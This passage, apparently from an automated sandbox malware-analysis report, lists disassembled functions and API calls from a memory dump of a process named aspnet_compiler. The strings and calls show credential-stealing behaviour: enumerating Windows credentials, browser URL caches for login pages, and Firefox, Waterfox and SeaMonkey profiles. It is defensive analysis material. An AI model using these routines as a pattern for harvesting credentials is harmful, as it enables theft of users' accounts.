                                                                                                                                                                                                                                                                    • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                                                                                                    • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                                                                                                                                    • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040BC75
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040BC8C
                                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                                                                                                                                                                                                  • memcmp.MSVCRT ref: 0040BCD6
                                                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 0040BD2B
                                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: memset$ByteChangeCharCloseFileFindFreeLocalMultiNotificationSizeWide_wcsicmpmemcmpmemcpy
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 509814883-3916222277
                                                                                                                                                                                                                                                                  • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                                                                                                                                                                  • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 774 41837f-4183bf 775 4183c1-4183cc call 418197 774->775 776 4183dc-4183ec call 418160 774->776 781 4183d2-4183d8 775->781 782 418517-41851d 775->782 783 4183f6-41840b 776->783 784 4183ee-4183f1 776->784 781->776 785 418417-418423 783->785 786 41840d-418415 783->786 784->782 787 418427-418442 call 41739b 785->787 786->787 790 418444-41845d CreateFileW 787->790 791 41845f-418475 CreateFileA 787->791 792 418477-41847c 790->792 791->792 793 4184c2-4184c7 792->793 794 41847e-418495 GetLastError ??3@YAXPAX@Z 792->794 797 4184d5-418501 memset call 418758 793->797 798 4184c9-4184d3 793->798 795 4184b5-4184c0 call 444706 794->795 796 418497-4184b3 call 41837f 794->796 795->782 796->782 804 418506-418515 ??3@YAXPAX@Z 797->804 798->797 804->782
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                                                                                                                                                                                  • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0041847E
                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0041848B
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CreateFile$??3@ErrorLast
                                                                                                                                                                                                                                                                  • String ID: |A
                                                                                                                                                                                                                                                                  • API String ID: 1407640353-1717621600
                                                                                                                                                                                                                                                                  • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                                                                                                                                                                                                  • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                                                                                                                                                                                  • String ID: r!A
                                                                                                                                                                                                                                                                  • API String ID: 2791114272-628097481
                                                                                                                                                                                                                                                                  • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                                                                                                                                                                                                  • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                                                                                                                                                                                                                                                    • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                                                                                                                                                                                                                                                    • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                                                                                                                                  • _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                                                                                                                                                                                  • wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: memset$??3@$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                                                                                                                                                                                  • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                                                                                                                                                                                  • API String ID: 62308376-4196376884
                                                                                                                                                                                                                                                                  • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                                                                                                                                                  • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                                                                                                                                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                                                                                                                                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                                                                                                                                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                                                                                                                                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                                                                                                                                                                  • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                                                                                                                                                                  • wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                                                                                                                                  • _wcsncoll.MSVCRT ref: 0040BE38
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040BE91
                                                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 0040BEB2
                                                                                                                                                                                                                                                                  • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                                                                                                                                                                                                  • wcschr.MSVCRT ref: 0040BF24
                                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AddressProc$CredEnumerateFreeLocal_wcsncoll_wcsnicmpmemcpymemsetwcschrwcslen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3191383707-0
                                                                                                                                                                                                                                                                  • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                                                                                                                                                                                  • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00403CBF
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00403CD4
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00403CE9
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00403CFE
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00403D13
                                                                                                                                                                                                                                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                                                                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                                                                                                    • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00403DDA
                                                                                                                                                                                                                                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                                                                                    • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                                                                                                                                                                                  • String ID: Waterfox$Waterfox\Profiles
                                                                                                                                                                                                                                                                  • API String ID: 3527940856-11920434
                                                                                                                                                                                                                                                                  • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                                                                                                                                                  • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00403E50
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00403E65
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00403E7A
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00403E8F
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00403EA4
                                                                                                                                                                                                                                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                                                                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                                                                                                    • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00403F6B
                                                                                                                                                                                                                                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                                                                                    • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                                                                                                                                                                                  • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                                                                                                                                                                                  • API String ID: 3527940856-2068335096
                                                                                                                                                                                                                                                                  • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                                                                                                                                                                  • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00403FE1
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00403FF6
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040400B
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00404020
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00404035
                                                                                                                                                                                                                                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                                                                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                                                                                                    • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004040FC
                                                                                                                                                                                                                                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                                                                                    • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                                                                                                                                                                                  • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                                                                                                                                                                                  • API String ID: 3527940856-3369679110
                                                                                                                                                                                                                                                                  • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                                                                                                                                                                  • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: memcpy
                                                                                                                                                                                                                                                                  • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                                                                                                                                                                                  • API String ID: 3510742995-2641926074
                                                                                                                                                                                                                                                                  • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                                                                                                                                                                  • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                                                                                                                                                                                                                                    • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                                                                                                                                                                                    • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004033B7
                                                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 004033D0
                                                                                                                                                                                                                                                                  • wcscmp.MSVCRT ref: 004033FC
                                                                                                                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 00403439
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: memset$??3@_wcsicmpmemcpywcscmpwcsrchr
                                                                                                                                                                                                                                                                  • String ID: $0.@
                                                                                                                                                                                                                                                                  • API String ID: 3030842498-1896041820
                                                                                                                                                                                                                                                                  • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                                                                                                                                                                  • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2941347001-0
                                                                                                                                                                                                                                                                  • Opcode ID: 887775328fc4d7656a99cf0210b1f43b8bf028f74b4fef276dc7ab680041333b
